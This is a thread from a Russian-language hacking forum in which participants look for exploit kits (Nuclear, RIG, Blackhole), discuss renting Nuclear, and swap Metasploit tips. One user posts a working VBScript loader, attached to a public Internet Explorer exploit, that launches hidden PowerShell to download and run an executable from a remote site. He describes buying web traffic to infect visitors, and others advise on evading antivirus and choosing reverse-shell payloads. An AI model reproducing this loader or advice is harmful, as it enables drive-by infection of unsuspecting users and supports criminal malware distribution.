![]() |
Здраствуйте,
Поделитесь ссылками на связки експлоитов имеющихся в паблике, сам пока не могу найти, все ссылки которые нахожу - битые...((( хелп плз |
|
Цитата:
|
Цитата:
Надо поискать у китайцев,может кто слил уже хотя бы старую,но про версию Хотя тот же метасплойт погибче будет |
Цитата:
результата никогда не добьёшься |
Про версия по моему 300 €, 500 это уже прем с тех поддержкой)
А так старые сборки того же Nuclear'a светились в сети. |
Цитата:
|
От паблик связки эффект будет тот же, приватные варианты стоят не плохих денег.
Да и связки это только инструмент, запилите в metasploit пару 0day к яве, флешу или браузеру и будет вам пробив. |
Цитата:
1. "запилите в metasploit пару 0day" - как я понимаю это означает скачать свежие rb-файлы с сайта метасплоита, залить их в "exploits\windows\browser" и потом использовать? 2. Некотрые експлоиты имеют в себе редиректы либо и-фреймы, которые ссылаються на некий относительный URL. Следовательно такие експлоиты нельзя сохранить просто так в html. Как ними пользоваться тогда? Использовать при запущенном метасплоите? |
Цитата:
Цитата:
|
понятно. спасибо большое за хороший ответ
|
Еще вопрос. Есть ли способ создать какой-то батник для Metasploit консоли, чтобы команды вручную не набирать, а сохранить большую цепочку?
|
Цитата:
Нанимай кодера, составляй ТЗ и будет тебе счастье) |
Цитата:
https://www.offensive-security.com/m...reter-scripts/ |
Цитата:
http://securityaffairs.co/wordpress...iffing-patch-management-the-side-threats.html https://exploitshop.wordpress.com/ https://xakep.ru/2011/11/16/57581/ |
Цитата:
|
Цитата:
|
у меня есть все другие связки, но хотел бы нуклер посмотреть
|
Цитата:
|
все из паблика, коллекционирую разный софт кони, лодыри, стиллеры, связки etc
|
Цитата:
|
Цитата:
|
Цитата:
|
Еще вопрос, подскажите кто спец.
Кроме MSF я отдельно тестировал вот этот сплоит: https://www.exploit-db.com/exploits/35229/ К нему я прикрепил вот такой загрузчик: set shell=createobject("Shell.Application") shell.ShellExecute "PowerShell.exe", "-WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://mysite.com/download/mysoft.exe','mysoft.exe');Start-Process 'mysoft.exe'", "", "open", 1 При тестировании работало обалденно, пробивает мою 7-ю винду с IE 11, тестировал через crossbrowsertesting сервис - успешно пробивало IE 11, IE 9 на Win Vista и Win 7. Но, когда купил IE траф отсюда: redirect.com - то где-то 1000 просмотров пустил, и ни одной загрузки...вот почему....что не так.. Подскажите плз...или с трафом тем что-то не так...тогда где его брать.. |
Антивири очень строго относятся к схеме загрузил mysoft.exe => сразу запустил mysoft.exe Тем более ты скачиваешь стандартными утилитами винды. Ну это моё мнение.
|
Вопрос: какие Payloads в метасплоите более пробиваемы? Реверс-шелы или модуль download_exec?
Если например взять какой-то реверс-шел и просто получить доступ к компам. А уже потом как-то дать всем команду грузить exe. Наверное это был бы более правильный способ чем сразу exe запускать? |
Цитата:
|
Цитата:
|
Цитата:
Если по теме уязвимостей и метасплойта то вот хороший китайский сайт http://www.metasploit.cn/forum.php Через гугл переводчик |
Цитата:
|
Цитата:
должно автоматически обновиться потом,я честно говоря пока использую все-таки метасплойт,то этот пак часто барахлит |
Цитата:
Я ржал)) |
Посмотрел ссылки... Противоречивое впечатление Exploitpack, действительно неоригинальный какой-то, а стоит очень даже весомо )) exploitshop.wordpress устаревший (висит последняя заметка о MS12-020 Remote Code Execution Так я вот под него эксплоит до сих пор ищу, нигде нету)
По поводу эксплоит-китов: Nuclear, конечно, рулит. Но его как найти, в даркнете, наверное, только...В паблике находил только исходники RIG и Blackhole их последних версий (последних уже навечно ). Круто было бы глянуть на хоть какие-нибудь паблик выкладки Nuclear'а, пусть и старые. P.S. Кстати, вы слышали что-нибудь про эксплоит-пак Microsoft Word Intruder ??? Недавно узнал про такой. Действует через скомпилированные вордовские доки (Ну действительно, актуально, удобно). Типа высокий пробив, в паблике экземпляров, якобы, нет... |
скиньте сайт официальный, где Nuclear купить можно. в выдаче посиковой не нахожу
|
официального сайта нету)
+ связку не каждому продадут + она не продается, а сдается в аренду. |
должно же тогда существовать место куда обращаться за услугами аренды
|
Jabber
и на подносе тебе его не принесут) |
Цитата:
|
Цитата:
|
Цитата:
около 700$ в неделю.. зависит от количества трафика которое пройдет через нее. |
| Время: 17:20 |